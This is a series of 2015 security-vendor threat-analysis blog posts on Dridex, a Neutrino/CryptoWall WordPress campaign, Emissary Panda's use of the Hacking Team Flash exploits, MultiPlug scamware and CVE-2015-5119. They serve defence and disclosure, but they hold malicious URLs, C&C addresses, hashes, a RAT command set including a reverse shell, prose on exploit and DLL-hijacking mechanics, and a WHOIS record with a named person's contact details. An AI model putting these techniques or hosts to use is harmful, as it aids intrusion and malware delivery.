Monday, August 24, 2015

Signed Dridex Campaign

Introduction

Malware authors use various means to make their malware look similar to legitimate software. One such approach involves signing a malware sample with a digital certificate. Recently we saw Dridex malware authors using this technique while reviewing the samples in our Cloud Sandbox. Dridex is a banking Trojan which typically arrives to a system via malicious spam email with a Microsoft Office file as an attachment. These files will have embedded macros that lead to the download and installation of the Dridex Trojan. Dridex then attempts to steal the victim's banking credentials and system information.

Signed Dridex campaign

Here we came across one malicious attachment with an encrypted macro that downloads signed Dridex samples from 81.17.28.101/bt/bt/sti[.]php. This Dridex sample is packed using a custom packer, which is is compiled with .NET. The current Dridex is signed with a certificate that is issued to Private Person Parobii Yuri Romanovich. This certificate as been specially created for spreading the Dridex malware.


Certificate
We also saw the following signer information in the certificates used for signing the Dridex executables:
  • PJSC "BIZNES AVTOMATYKA
  • AVTOZVIT Scientific Production Private Company
  • Private Person Parobii Yuri Romanovich
The certificates were all issued by COMODO and we observed the following URLs serving the signed Dridex malware:
  • 185.14.29.214/bt/bt/sdp [.] php
  • 81.17.28.101/bt/bt/sti [.] php
  • 5.196.241.204/bt/bt/ched [.] php
  •  217.12.203.171/bt/bt/freda [.] php
  • 94.250.252.13/bt/bt/stata [.] php
  • 149.202.146.176/bt/bt/chdid [.] php
  • 93.170.105.60/bt/bt/grtes [.] php
Below are the Dridex samples served from the aformentioned URLs. All tof he samples are packed with the same .NET packer mentioned above:
  • 5CA1DBA1C72AC999E221DE98BBC584C4
  • 9E73E0C4B92253C5F8B6648F29B28B5B
  • CD243B30B9BBD682C082CFEFDBF79ACD
  • E578618F2D38FC251D52D1366144404F
  • 5F907702CE229937955B4DCE92EC4575
  • DC443FBB5FB6125EBEEEBEC2E4BAA372
  • 0BBC8CD08E9958ACDE0519A2B2840CD7
  • 9D1D0632329F04D8B1EC21AFF4CE6493
  • 32230D747829DCF77841F594AA54915A
  • 8F1A9A9830FF02C5C2BA4C17DFE8B09D
  • 00DCA835BB93708797A053A3B540DB16
  • 393E2145F4C3E9B5697A2AAEB25AA8D3
  • 1992170FDC642D4A99A7BC82BA82FA31
  • 9261B8EAF1DA3D9CFF522875A7198667
  • FB67C85F3F42D3E48B9E7B7637D30858
  • E578618F2D38FC251D52D1366144404F
Dridex Packer:
The Dridex sample is embedded in the resource section of the packer. After unpacking, it drops a Borland Delphi executable file. The following is the snapshot of encrypted resource section:

Encrypted Resource Section
Dridex Activity:
The current Dridex sample tries to connect to different IPs included in the config file. The config file for the sample is embedded in the sample itself. In the config file we observed a botnet ID and list of  C&C servers. Below is a snapshot of config file:

Configuration file
Dridex collects and sends the following system information to one of the C&C mentioned in the config file:
  • Computer Name
  • User Name
  • Windows Version
  • Botnet ID
Information sent to the server
Below is the complete list of C&Cs it tries to connect.
  • 80.247.233.18
  • 91.121.82.113
  • 69.164.213.85
  • 79.143.191.147
  • 199.241.30.233
  • 162.243.12.14
  • 188.93.73.90
  •  195.154.184.240

Conclusion

The use of a legitimate certificate in signing malware executables to evade security detection is not new but is still very effective. The malware author aims to exploit the Code-Signing Certificate based whitelisting approach by signing their samples. Zscaler ThreatlabZ is actively monitoring these signed malware campaigns and ensuring coverage for our customers.

Analysis by Tarun Dewan and Nirmal Singh

Thursday, August 20, 2015

Neutrino Campaign Leveraging WordPress, Flash for CryptoWall

Overview

Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we've seen a massive uptick in the use of the kit. The cause for this uptick appears due to widespread WordPress site compromises.

ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.

Fig 1. Complete Neutrino WordPress campaign

In analyzing the infection cycle, there are multiple recent changes in the Neutrino code, some that are normally characteristics of Angler Exploit Kit, but others that remain unique to Neutrino.

WordPress Compromises

Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, we have seen over 2600 unique WordPress sites being used in this campaign where more than 4200 distinct pages have been logged with dynamic iframe injection in the last month. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.

Fig 2. Event timeline overview

The goal of this campaign is to completely and fully compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare these recent Neutrino and Angler samples below.

Fig 3. Neutrino on the left, Angler on the right

The code specifically targets Internet Explorer, so those using other browsers won't be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.

The actual Neutrino landing pages are retrieved on the backend through the injected php code, a sample of which is below:

Fig 4. Injected php code

Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
http://93.171.205.64/blog/?bf4z&utm_source=XXXXX:YYYYYY:ZZZ
This URL is used to retrieve an updated landing page URL, and we've noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is '185.44.105.7' which is owned by VPS2DAY.com. We reached out to them via email briefly explaining what we were seeing and received no response.

Neutrino Landing Page

The landing page has been updated and contains some JavaScript that only declares variables, and then a flash loader:

Fig 5. Neutrino landing page

If flash isn't installed on the victim machine, an old flash cab is pushed to the user prior to serving the malicious SWF. Note the departure from using base64 encoded data blobs, or really using very much code at all on the landing page.

Neutrino SWF

Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:

Fig 6. SWF structure

Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:

Fig 7. Decode function for embedded SWF

Detection results for the SWF are very poor with only one vendor detecting it:

Fig 8. Poor detection results on SWF

Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:

Fig 9. Binary data inside embedded SWF

Fig 10. Script data inside embedded SWF - characteristic of Neutrino

These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O'Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:

Fig 11. Decoder for one binarydata 'exploitWrapper' blob
Detection on the embedded SWF is also quite poor.
Fig 12. Embedded SWF VT detection

Payload

Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:

Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample

Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers:

Fig 15. Payment server connections

Fig 16. CryptoWall 3.0 HELP_DECRYPT page

To read more about CryptoWall, please see our previous writeup here.

Campaign Information

As stated, the primary IP for the observed Neutrino landing pages is '185.44.105.7' which is owned by VPS2DAY.com. Many of the domains pointing to that IP utilize 'xyz', 'ga', 'gq', and 'ml' TLDs. Taking a look at the whois data for some of these domains, a common attribute seems to be the name 'Max Vlapet' for .XYZ domains. Full whois domain sample for completeness:

WHOIS MOHGROUP.XYZ

Domain Name: MOHGROUP.XYZ 
Domain ID: D9543161-CNIC 
WHOIS Server: whois.alpnames.com 
Referral URL: 
Updated Date: 2015-08-18T08:34:04.0Z 
Creation Date: 2015-08-18T08:34:03.0Z 
Registry Expiry Date: 2016-08-18T23:59:59.0Z 
Sponsoring Registrar: AlpNames Limited 
Sponsoring Registrar IANA ID: 1857 
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited 
Domain Status: addPeriod https://icann.org/epp#addPeriod 
Registrant ID: ALP_44867689 
Registrant Name: Max Vlapet 
Registrant Organization: N/A 
Registrant Street: Mausoleum str, pl.13 
Registrant City: Moscow 
Registrant State/Province: Moscow 
Registrant Postal Code: 123006 
Registrant Country: RU 
Registrant Phone: +7.4959826524 
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: maxvlapet@gmail.com 
Admin ID: ALP_44867689 
Admin Name: Max Vlapet 
Admin Organization: N/A 
Admin Street: Mausoleum str, pl.13 
Admin City: Moscow 
Admin State/Province: Moscow 
Admin Postal Code: 123006 
Admin Country: RU 
Admin Phone: +7.4959826524 
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: maxvlapet@gmail.com 
Tech ID: ALP_44867689 
Tech Name: Max Vlapet 
Tech Organization: N/A 
Tech Street: Mausoleum str, pl.13 
Tech City: Moscow 
Tech State/Province: Moscow 
Tech Postal Code: 123006 
Tech Country: RU 
Tech Phone: +7.4959826524 
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: maxvlapet@gmail.com 
Name Server: NS2.MOHGROUP.XYZ 
Name Server: NS1.MOHGROUP.XYZ 
DNSSEC: unsigned 
Billing ID: ALP_44867689 
Billing Name: Max Vlapet 
Billing Organization: N/A 
Billing Street: Mausoleum str, pl.13 
Billing City: Moscow 
Billing State/Province: Moscow 
Billing Postal Code: 123006 
Billing Country: RU 
Billing Phone: +7.4959826524 
Billing Phone Ext: 
Billing Fax: 
Billing Fax Ext: 
Billing Email: maxvlapet@gmail.com 
>>> Last update of WHOIS database: 2015-08-19T00:44:12.0Z <<< 

Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine.

A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin: http://pastebin.com/946rPaGx

Conclusion

WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals.  WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena.

ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.

Acknowledgement

Special thanks to Dhruval Gandhi for profiling compromised WordPress sites

Write-up by: John Mancuso, Deepen Desai



Chinese cyber espionage APT group ‘Emissary Panda’ activity update


Introduction

Last week we shared research on the Chinese cyber espionage APT group ‘Emissary Panda’ and how the group is for the first time leveraging Hacking Team’s leaked exploits to target a multinational financial services firm. Upon further analysis we have identified multiple other industry verticals that were also targeted by this group in the last month. The ‘Emissary Panda’ APT group has been known to target the government and technology sectors with the intent to monitor and steal intellectual property data.

There were multiple global clients targeted in the last month that belong to following industry verticals:
  • Financial Services
  • Energy
  • Pharmaceutical

Attack Chain

As noted before, this was the first instance of the ‘Emissary Panda’ group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives. We were able to confirm usage of Adobe Flash exploits CVE-2015-5119 and CVE-2015-5123 in these attacks.

In the attack against a Pharmaceutical firm, we observed the use of a compromised Government site to redirect the victim to a server hosting the Hacking Team’s 0-day Flash exploit. This technique is known as Strategic Web Compromise (SWC) or a Watering Hole attack, wherein a legitimate trusted website known to be visited by the target group is compromised in order to redirect them to the attacker controlled server. The attacker controlled server will serve and execute browser based exploits to install a RAT on the target machine.

APT Attack chain targeting a multinational Pharmaceutical company
In this attack, we were able to prevent the download and installation of the RAT payload.

In another instance, spearphishing e-mail was used to target an organization in energy sector that resulted in installation of HttpBrowser RAT. The attacks against these organizations were largely unsuccessful as the Zscaler security platform blocked either the exploitation attempt or the Command & Control communication attempt.

Emissary Panda APT attacks seen in last month
We are still investigating some of these attack chains and will share additional details when they become available.

Conclusion

It is alarming to see an uptick in the activity from this group targeting multiple verticals with organizations located in United States, Europe, Middle East, and Asia. In order to protect themselves, it is extremely important for organizations to have SSL security inspection enabled as well as a Sandbox environment to detonate and block the 0-day exploits involved in such targeted attacks.

Friday, August 14, 2015

Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm

Introduction

As predicted following the leak of Hacking Team exploit codes covered here, the Zscaler security research team has recently started seeing a Chinese cyber espionage group weaponizing malware payloads using the 0-day exploits found in the leaked Hacking Team archives. As such, this new attack represents a dangerous new hybrid combining the work of a notorious cyber criminal gang with Chinese cyber espionage group to attack a financial services firm. 

Zscaler's cloud sandboxes recently detected a Remote Access Trojan (RAT) being delivered by a well-known Chinese cyber espionage group using the Hacking Team’s 0-day exploits. This attack was specifically targeting a well-known financial services firm. The exploit files involved were identical to the Hacking Team's leaked exploit HTML, JavaScript, and ShockWave Flash 0-day files. The end payload that was installed is the HttpBrowser RAT, known to be used by the Chinese group in previous targeted attacks against governments.

Figure 1: Chinese APT attack cycle to plant HttpBrowser RAT

Hacking Team Exploits

The attack involved targeted users visiting a malicious URL delivered via a spear phishing attack. The malicious URL points to a remote server located in Hong Kong (IP Address - 210.209.89.162) that downloads and executes a malicious ShockWave Flash payload through a specially crafted HTML & JavaScript. The exploit files involved are identical to the ones that we found during our analysis of the Hacking Team leaked code as seen below:

Figure 2: Resemblance with Hacking Team's exploit HTML

Figure 3: Resemblance with Hacking Team's SWF exploit
The Adobe ShockWave exploit (CVE-2015-5119) if successful will download and install a variant of the HttpBrowser RAT from the same Hong Kong based server which eventually also serves as the Command & Control (C&C) server.

Figure 4: Hong Kong based server used in the attack [credit: domaintools.com]

Malware Payload - HttpBrowser RAT

HttpBrowser is a RAT that has become extremely popular in past two years among the APT adversaries, leveraged in various targeted attacks. The RAT has been leveraged as the primary payload by the APT group that is also known to install the nasty Backdoor PlugX RAT during lateral movement in the victim environment after compromise.

The HttpBrowser payload used for the attack was compiled just few days before the attack as seen below:
Figure 5: HttpBrowser payload compilation time
The HttpBrowser installer archive structure is very similar to that observed in previous PlugX attacks. The installer archive in our case was svchost.exe (saved as xox.exe) that consisted of the following three files:
  • VPDN_LU.exe - A legitimate digitally signed Symantec Antivirus executable to evade detection
Figure 6: Legitimate Symantec Antivirus executable used in the attack 
  • navlu.dll - A fake Symantec DLL to decrypt and run the HttpBrowser RAT
  • navlu.dll.url - Encrypted HttpBrowser RAT payload
The HttpBrowser RAT installer is responsible for dropping the above three files and running the legitimate Symantec Antivirus binary VPDN_LU.exe. The legitimate binary contains the navlu.dll in the import table ensuring that the DLL will be loaded before it runs. The navlu.dll that gets loaded in this case will be the fake Symantec DLL file present in the same directory and it will patch the entry point of the main executable file with a jump instruction to run the DLL’s code instead. 

Figure 7: Legitimate executable entry point patched
This technique is also known as DLL Hijacking which ensures that the fake Symantec DLL gets loaded by abusing the Windows DLL load order. The DLL’s code is responsible for decrypting and running the HttpBrowser RAT payload from the navlu.dll.url file in the same memory space of the benign executable. The decryption routine consist of an incremental XOR as seen below:

Figure 8: Incremental XOR routine to decrypt RAT payload
The HttpBrowser installer structure ensures that the malware evades detection by running in the context of the legitimate signed binary. This also ensures that the malicious DLL will not run by itself in automated analysis environments.

The malware then deletes the original installer file and moves the dropped files to the following location:
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\navlu.dll
  • %ALLUSERPROFILE%\%APPDATA%\vpdn\navlu.dll.dll
The malware also creates the following registry entry to ensure persistence:
  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe”

Command & Control communication

The HttpBrowser RAT variant was configured to connect to the following Command & Control server upon successful infection:
  • update.hancominc[.]com:8080
It relays the following information of the victim machine in an encrypted format over SSL:
/loop?c=<computerName & userName>&l=<IP Address>&o=<Operating System details>&u=<GUID>&r=<Injection Status (Boolean)>&t=<Running Time>
The commands supported by this RAT variant are:

Command
Description
init
start reverse shell and send list of drives on infected system.
setcmd
change the default (cmd.exe) shell
settime
Set sleep time
uninstall
uninstall itself
write
write command to shell
list
Send list of files and folders to C&C
upload
Download file from C&C
down
Upload file to C&C

















Here are some sample decrypted C&C transactions from the HttpBrowser RAT:

Figure 9: List of drives sent as part of the init command

Figure 10: List of files sent as part of the list command

Conclusion

HttpBrowser RAT, due to the range of features including SSL based C&C channel, anti-detection & anti-analysis techniques, remains the popular malware of choice for APT attacks. There have been multiple instances where this RAT co-existed with PlugX RAT on the compromised network indicating an APT adversary group with a set attack tool arsenal. The network infrastructure leveraged in this attack against the financial services firm shows involvement of a previously known Cyber espionage APT group of Chinese origin. The main motive of this group is to monitor and exfiltrate intellectual property data from the target organization.

Zscaler’s ThreatLabZ has confirmed coverage for these exploits and for the HttpBrowser variant, ensuring protection for organizations using Zscaler’s Internet security platform.

Research by: Abhay Yadav, Avinash Kumar, Nirmal Singh, Deepen Desai

Wednesday, July 29, 2015

Anatomy of a Scamware Network - MultiPlug


While examining our cloud sandbox data recently, we uncovered a large MultiPlug network that caught our attention due to its use pattern of code signing certificates and the breadth of its hosting infrastructure.


Overview of the Scamware Hosting Network (Node Legend -- Red: Host, Pink: Domain, Green: File-MD5)



As we discussed in June, MultiPlug is a common scamware family that tricks users into downloading/installing an initial binary, which then delivers a variety of additional spyware packages. Search poisoning is used to bait users into installing the scamware, with the lures including cracked and legitimate software, pirated music and movies, as well as other documents and files that a user might be seeking.


This installer pretends to help speed up your downloads

After taking the bait and executing the file, the user is presented with one of several typical-looking installer dialogs that promise to deliver what the user was originally searching for. Whether the user realizes the mistake or not, the “installer” will proceed to fetch multiple encrypted payloads from a remote webserver. The installation of the payloads continues even if the user clicks the various “Decline”, “Cancel”, or “Exit” buttons. Throughout the process, the scamware also gathers system information and sends it to remote webservers.


Data sent to remote servers via HTTP POST

Several typical components of the scamware include a payload called ‘compfix’ that is installed as a system service to be run at boot time, as well as a payload called ‘SystemStrengthener’.


'compfix' installed as a service



Besides the benevolent sounding payloads mentioned above, the scamware makes a few changes to the user’s Browser configuration. If Chrome is installed, two DLLs are dropped into the Chrome installation directory that appear to be modified and slightly outdated versions of ‘chrome.dll’. Chrome and Internet Explorer also receive browser extensions that spy on user behavior and serve ads. As a bonus, the IE add-ons are marked as uninstallable without Administrator approval.


Modified Chrome DLLs with invalid certs


User is prevented from disabling scamware addons

User is prevented from disabling scamware addons

New Chrome addons installed without notice

Apart from some additional obfuscation layers compared to previous versions, the technical aspects of this malware are fairly standard. However, the breadth of the hosting network and the pattern of code signing certificates used, made this an interesting campaign. We uncovered 33 unique certificates, all issued from the same Certificate Authority: Certum / Unizeto Technologies. (Note: we also identified other adware campaigns utilizing Certum certificates, though they appeared to be unrelated.)

Unizeto Technologies / CERTUM issued certificates (Node Legend -- Yellow: Issuer, Blue: Signer)


These 33 certificates were used to sign 2,783 pieces of scamware that were hosted on 447 unique hosts (323 unique domains). While it's normal for adware campaigns that utilize code signing to rotate through their certificates as they are blocked by AV and security companies, the volume of unique signing certificates in use signals that something is different here. Additionally, the data in the signatures indicates that all of the certificates are owned by individual persons with free email accounts. This hinders naive blacklisting as well as attribution, since there is no clear way to link the campaign to a specific organization.


Overview of the Scamware Network (Node Legend -- Yellow: Issuer, Blue: Signer, Red: Host, Pink: Domain, Green: File-MD5)

Given the nature of this MultiPlug campaign, it is easy to hypothesize that the organization behind it has more evil-intent than the usual adware/scamware operators. That said, it could just be a matter of the organization trying to maximize their ROI for this large infrastructure they operate. Regardless of their intentions, enterprises should be wary of even the most innocuous looking adware due to the ability to perform system and network reconnaissance, achieve persistence on infected hosts, deliver arbitrary payloads, and take control of the system, it's applications, and it's data.



Monday, July 13, 2015

Adobe Flash Vulnerability CVE-2015-5119 analysis


With the leak of Hacking Team's data, the security industry came to learn about multiple new 0day vulnerabilities targeting Flash, Internet Explorer, Android, etc. As always, exploit kit authors were quick to incorporate these 0day exploits into their arsenal.

In this blog, we will be looking at the CVE-2015-5119 exploit payload that we have now seen in the wild. The sample has multiple layers of obfuscation and packer routines. The malicious Flash payload is packed, XOR'ed and stored as a binary data inside a parent Flash file that dynamically unpacks a malicious Flash file and writes it to memory at run time.

Here is the structure of the CVE-2015-5119 exploit payload:


Packages, properties and method names are stored in variables for obfuscation:


Here we observe the calling of the unpack routine to decrypt the embedded SWF exploit payload:


An XOR key is used for unpacking and is hardcoded and assigned to the variable vari_10. This is what the unpacked content looks like:



Upon decompilation, it is apparent that majority of the codebase, including variable names and function names are the same as what we saw in the leaked source by the Hacking Team. The public exploit also has checks for:
  • Presence of a debugger
  • Operating System bitness (32-bit or 64-bit)


When the program execution starts, the ActionScript looks for the input parameters and based on it, sets a variable which is then sent to the main exploitation routine as seen below:


The TryExpl() routine allocates sequential pages of memory and begins the exploit cycle:



The vulnerability lies in making use of the valueOf property and corrupting the vector space so that the valueOf  property will overwrite the length field of the vector object, which will be further used to get access to vtables.

Here is explicit definition of valueOf function


prototype.valueOf() is setting up the length of the ByteArray to 4352

Once the memory allocation is done, a MyClass object is created and assigned to _ba[3]. The
valueOf()  function defines the length of ByteArray to 4352, which is greater than the length of the object created, causing reallocation of bytes inside the memory.



If the value of _ba[3] is set to zero after the assignment then it was successful in triggering a Use After Free vulnerability. The exploit code looks for the kernel32.VirtualProtect() (VP) function in the corrupted vector space as seen below:


A call to the VP function is made, which replaces the vtable pointer and sets the PAGE_EXECUTE_READWRITE permission before executing the final payload.



Hashes of  CVE-2015-5119 exploit payloads seen in the wild:




  • 061c086a4da72ecaf5475c862f178f9d
  • 079a440bee0f86d8a59ebc5c4b523a07
  • 16ac6fc55ab027f64d50da928fea49ec
  • 313cf1faaded7bbb406ea732c34217f4
  • 6d14ba5c9719624825fd34fe5c7b4297


  • Conclusion

    It will be a challenge for security vendors to get container file detection in place as majority of the time, the embedded content is highly obfuscated with multiple levels of packing. Adobe has already released a patch to fix this issue. We highly recommend enabling the Adobe's auto update feature to keep the relevant plugins updated.

    References: